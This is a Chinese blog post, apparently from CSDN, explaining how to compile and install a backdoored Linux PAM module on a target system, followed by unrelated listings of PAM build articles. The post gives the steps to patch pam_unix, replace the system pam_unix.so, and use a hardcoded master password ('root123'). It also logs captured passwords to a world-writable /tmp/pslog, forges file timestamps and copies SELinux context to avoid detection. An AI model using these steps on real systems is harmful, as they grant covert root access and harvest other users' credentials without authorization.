linux-pam 编译,PAM后门编译安装

最新推荐文章于 2024-03-18 12:00:00 发布
最新推荐文章于 2024-03-18 12:00:00 发布
阅读量1.3k 收藏 1
点赞数
文章标签: linux-pam 编译

PAM有许多版本,我们首先要从官方下载目标所使用的PAM源码包,并在本地修改后编译生成出pam_unix.so文件进行替换

http://www.linux-pam.org/library/

https://fedorahosted.org/releases/l/i/linux-pam/

获取目标系统所使用的PAM版本:rpm -qa|grep pam

下载后,在对应的系统环境下(32或x86_64位系统下)编译生成后门,patch目录下的“pam_unix_auth.c.patch”文件就是

补丁文件,pam_unix_auth.c 是PAM

1.1.1版本pam_unix.so的源文件,仅作参考。我们将补丁文件移动到源码目录,并使用patch命令对PAM源代码打补丁,然后编译生成即可。

afa6f8469f3b43278578a599abc9379d.gifmv pam_unix_auth.c.patch Linux-PAM-1.1.1/modules/pam_unix/

cd Linux-PAM-1.1.1/modules/pam_unix

patch 

cd ../../

./configure & make

编译完后的文件在:modules/pam_unix/.libs/pam_unix.so

a2e6e3b3fba3830d399cc8d2f79b878d.gif

后门的默认密码:root123

记录密码的文件:/tmp/pslog

将生成的pam_uninx.so文件覆盖/lib/secruity/pam_unix.so或/lib64/security/pam_unix.so(记得备份原始文件),修改文件属性,手动建立密码保存文件,并使用touch命令克隆文件时间,如果selinux是开启的环境,一定要关掉或者设置好上下文pam_unix.so才能正常工作,搞定ok。

手动创建密码文件:touch /tmp/pslog;chmod a+w /tmp/pslog

克隆原始文件时间:touch pam_unix.so -r pam_unix.so.src

查看Selinux上下文:ls -Z pam_unix.so.src (备份的原始文件)

设置Selinux上下文:chcon –reference=pam_unix.so.src pam_unix.so

编译报错问题:

64位系统编译可能会遇到yywrap()函数未定义错误,只需安装flex软件包就可以正常编译了

示例:

fa15a1ee6cba3e9629cec9fa2d56f955.gifyum install flex

下载地址:

1感谢乌云某个兄弟

2不要在骂我了

weixin_39879665
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Linux开发:pam5 Ubuntu22.04中编译linux-pam
风静如云的博客
02-25 252
注:可通过./configure --help | less查看可配置的项, 并通过./configure 进行配置。linux-pam不仅包含了源代码还有相关的文档以及例子,是学习pam的一个很好的参考。Ubuntu22.04中使用的是linux-pam。进入linux-pam/ci目录,执行。编译完成后,可以通过如下命令检查。在linux-pam目录执行。在linux-pam目录执行。可以执行如下命令进行安装安装完成后文件会被安装在。
linux编译pam时出现段错误
wangsuyu_1的博客
04-27 786
错误描述: make[3]: Entering directory '/root/rpmbuild/BUILD/Linux-PAM-1.1.8/modules/pam_faillock' /usr/bin/xsltproc --path . --xinclude --stringparam generate.toc "none" --nonet http://docbook.sourcefor
Linux运维_Bash脚本_编译安装Linux-PAM-1.3.1
最新发布
goufeng93的博客
03-18 368
Linux运维 Bash脚本 编译安装Linux-1.3.1。
linux编译内核支持pam,linux编译内核make menuconfig报错解决办法
weixin_30068505的博客
05-01 317
linux编译内核时输入make menuconfig命令*** Unable to find the ncurses libraries or the*** required header files.*** 'make menuconfig' requires the ncurses libraries.****** Install ncurses (ncurses-devel) and tr...
pam交叉编译用到的源码包
07-12
cracklib-2.9.7.tar.gz、cracklib-words-2.9.7.bz2、libpwquality-1.4.4.tar.gz、Linux-PAM-1.3.1.tar.gz、shadow-4.8.tar.gz
vsftpd与PAM模块编译安装及测试流程
人人都懂物联网
04-22 7025
背景:由于产品需求,需要在嵌入式 Linux 平台提供安全的内部 FTP 服务,所以尝试选择 vsftpd + PAM 的方式实现。1 概述  vsftpd的全名是“Very Secure FTP Daemon”,显然,vsftpd的发展理念就是构建一个以安全为重心的FTP服务器。为什么“非常安全”?(1)vsftpd尽量将服务取得的PID权限降低,使得服务即使不小心被入侵,入侵者也无法得到有效的系
Linux-PAM-1.3.0.tar.gz_PAM_linux_pam 1.3.1
09-23
Linux-PAM-1.3.0.tar.gz这个压缩包中,包含了版本为1.3.0的PAM的源代码和其他相关文件,允许用户在系统上安装和配置PAM来实现多样的认证策略。 PAM的核心概念在于“插件式”,这意味着它能够根据需求加载不同的...
The Linux-PAM System Administrators' Guide 1.1.2
10-11
"Linux-PAM 系统管理员指南" Linux-PAM(Pluggable Authentication Modules,插入式身份验证模块)是 Linux 操作系统中的一种身份验证机制,允许系统管理员根据需要选择和配置不同的身份验证模块,以满足不同的身份...
pam.tar.gz_linux pam _linux-pam
09-24
**PAM(Pluggable Authentication Modules)在Linux系统中的应用** PAM,即插拔式认证模块,是Linux操作系统中一种灵活的身份验证框架。它允许系统管理员根据需求配置不同的认证策略,无需修改核心系统代码。PAM...
Linux-PAM的分析与应用.pdf
09-06
Linux-PAM,全称为Pluggable Authentication Modules,是Linux操作系统中的一个关键组件,主要用于实现灵活的身份验证机制。PAM的设计目标是将认证过程与应用程序本身分离,使得系统管理员可以根据需要自由选择和...
Linux-PAM-1.1.8.tar.bz2下载
07-18
linux pam源码
Linux——PAM-的应用开发和内部实现源码分析
11-16
Linux——PAM-的应用开发和内部实现源码分析,介绍了如何利用PAM模块编程进行对Linux操作系统安全访问。
基于PAM的用户权能分配实现源码
03-31
基于PAM的用户权能分配实现源码,包括脚本文件,c程序实现。
PAM
03-10
PAM
pam源码安全认证模块交叉编译、移植
m0_73022496的博客
10-09 1088
进入PAM安装目录,将lib下的libpam.so和libpam_misc.so库文件拷贝至目标机/lib目录,将 lib下的security目录拷贝至目标机/lib, 将etc目录下的文件拷贝至目标机/etc目录。在/home/twelve/cracklib-2.9.8/src/build、目录下会生成对应文件。目录/home/twelve/linux-pam-1.3.1/build/会生成对应文件。linux-pam-1.3.1/doc/man/Makefile.in目录和。此处是我是用以下命令。
PAM 的应用开发和内部实现源码分析
chenyulancn的专栏
09-27 5115
本文主要通过对Linux PAM源代码进行分析,阐述了PAM的内部实现机制和怎样在应用程序中应用PAM进行认证,以及怎样开发PAM服务模块。 1 引言 身份认证是操作系统安全的重要机制之一,系统通过认证机制核查用户的身份证明,并作为用户进入系统的判定条件,是防止恶意用户进入系统的第一道门槛。近年来认证理论和技术得到了迅速发展,产生了各种认证机制,如口令机制,RSA, DCE, kerberos
LinuxPAM模块学习总结
Nicholas的专栏
07-09 2172
Linux中执行有些程序时,这些程序在执行前首先要对启动它的用户进行认证,符合一定的要求之后才允许执行,例如login, su等。在Linux中进行身份或是状态的验证程序是由PAM来进行的,PAM(Pluggable Authentication Modules)可动态加载验证模块,因为可以按需要动态的对验证的内容进行变更,所以可以大大提高验证的灵活性。 一、PAM模块介绍 Linux-PAM(即linux可插入认证模块)是一套共享库,使本地系统管理员可以随意选择程序的认证方式。换句话说,不用(重新编
linuxpam源码下载,Linux-PAM-0.99.6.2 - 源码下载|系统编程|Linux/Unix编程|源代码 - 源码中国...
weixin_34508682的博客
05-13 603
Linux-PAM-0.99.6.2..................\ABOUT-NLS..................\acinclude.m4..................\aclocal.m4..................\aclocal.m4.audit..................\AUTHORS..................\autom4te.cache...
编写PAM模块实例
weixin_40194331的博客
07-11 1586
https://www.zybuluo.com/lm911/note/1210091
TheLinux-PAM系统管理员指南.doc
02-23
TheLinux-PAM系统管理员指南

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值